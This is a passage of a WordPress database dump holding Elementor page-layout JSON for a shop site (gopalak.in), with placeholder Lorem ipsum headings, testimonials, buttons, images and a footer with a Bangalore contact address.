nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8775,1516,'_elementor_page_assets','a:0:{}'),(8777,1517,'_elementor_edit_mode','builder'),(8778,1517,'_elementor_template_type','wp-page'),(8779,1517,'_elementor_version','3.7.8'),(8780,1517,'_wp_page_template','elementor_canvas'),(8781,1517,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"459f42f\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":733,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"ff18146\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d32e3fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_custom_dimension\":{\"width\":\"3400\",\"height\":\"1300\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"cca4b63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ae5ba57\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_custom_dimension\":{\"width\":\"3400\",\"height\":\"1300\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"0b52a20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0f21eac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_custom_dimension\":{\"width\":\"3400\",\"height\":\"1300\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John 